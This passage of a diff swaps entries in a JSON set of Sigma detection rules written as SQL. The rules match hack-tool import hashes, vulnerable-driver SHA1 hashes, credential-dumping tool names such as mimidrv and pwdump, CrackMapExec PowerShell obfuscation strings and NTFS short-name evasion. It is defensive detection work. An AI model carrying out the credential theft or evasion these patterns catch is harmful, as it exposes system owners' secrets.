('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', 
'3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron 
Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": 
"experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE 
